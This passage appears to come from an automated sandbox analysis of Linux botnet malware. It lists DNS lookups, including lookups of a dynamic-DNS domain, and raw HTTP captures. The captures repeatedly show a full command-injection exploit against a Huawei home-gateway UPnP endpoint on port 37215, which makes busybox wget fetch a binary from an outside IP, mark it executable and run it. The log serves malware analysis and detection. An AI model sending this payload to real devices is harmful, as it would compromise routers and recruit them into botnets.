                                                                      Aug 2, 2024 13:16:53.206549883 CEST192.168.2.148.8.8.80x464eStandard query (0)cdn.fwupd.orgA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:16:53.206558943 CEST192.168.2.141.1.1.10x2bdcStandard query (0)cdn.fwupd.org28IN (0x0001)false
                                                                      Aug 2, 2024 13:16:53.956332922 CEST192.168.2.148.8.8.80xd353Standard query (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:16:53.956338882 CEST192.168.2.141.1.1.10xe958Standard query (0)motd.ubuntu.comA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:16:55.151451111 CEST192.168.2.14195.10.195.1950x2963Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:16:58.456057072 CEST192.168.2.148.8.8.80x464eStandard query (0)cdn.fwupd.orgA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:16:58.456056118 CEST192.168.2.141.1.1.10x2bdcStandard query (0)cdn.fwupd.org28IN (0x0001)false
                                                                      Aug 2, 2024 13:16:59.206073999 CEST192.168.2.148.8.8.80xe958Standard query (0)motd.ubuntu.comA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:16:59.206182957 CEST192.168.2.141.1.1.10xd353Standard query (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:03.705765963 CEST192.168.2.148.8.8.80x464eStandard query (0)cdn.fwupd.orgA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:03.709070921 CEST192.168.2.141.1.1.10x2bdcStandard query (0)cdn.fwupd.org28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.455811024 CEST192.168.2.148.8.8.80xe958Standard query (0)motd.ubuntu.comA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.455811977 CEST192.168.2.141.1.1.10xd353Standard query (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:18:33.581051111 CEST192.168.2.1494.16.114.2540x2983Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:33.596187115 CEST192.168.2.1494.16.114.2540x2983Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:33.608664036 CEST192.168.2.1494.16.114.2540x2983Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:33.620461941 CEST192.168.2.1494.16.114.2540x2983Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:33.631521940 CEST192.168.2.1494.16.114.2540x2983Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:34.380583048 CEST192.168.2.1451.254.162.590xb036Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:39.385560036 CEST192.168.2.1451.254.162.590xb036Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:44.393023014 CEST192.168.2.1451.254.162.590xb036Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:49.397525072 CEST192.168.2.1451.254.162.590xb036Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:18:54.404253006 CEST192.168.2.1451.254.162.590xb036Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Aug 2, 2024 13:16:55.288803101 CEST195.10.195.195192.168.2.140x2963No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:03.881216049 CEST8.8.8.8192.168.2.140x464eNo error (0)cdn.fwupd.orgdualstack.p2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:03.889789104 CEST1.1.1.1192.168.2.140x2bdcNo error (0)cdn.fwupd.orgdualstack.p2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.506629944 CEST8.8.8.8192.168.2.140xe958No error (0)motd.ubuntu.com34.254.182.186A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.506629944 CEST8.8.8.8192.168.2.140xe958No error (0)motd.ubuntu.com54.247.62.1A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.506629944 CEST8.8.8.8192.168.2.140xe958No error (0)motd.ubuntu.com34.243.160.129A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.506629944 CEST8.8.8.8192.168.2.140xe958No error (0)motd.ubuntu.com54.217.10.153A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.506629944 CEST8.8.8.8192.168.2.140xe958No error (0)motd.ubuntu.com54.171.230.55A (IP address)IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.507437944 CEST1.1.1.1192.168.2.140xd353No error (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.507437944 CEST1.1.1.1192.168.2.140xd353No error (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.507437944 CEST1.1.1.1192.168.2.140xd353No error (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.507437944 CEST1.1.1.1192.168.2.140xd353No error (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Aug 2, 2024 13:17:04.507437944 CEST1.1.1.1192.168.2.140xd353No error (0)motd.ubuntu.com28IN (0x0001)false
                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      0192.168.2.1453030102.187.77.10737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.603527069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202135086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.906115055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.282063961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      1192.168.2.1451506156.121.33.9937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.604944944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.298249960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.130187035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.762255907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.121999979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
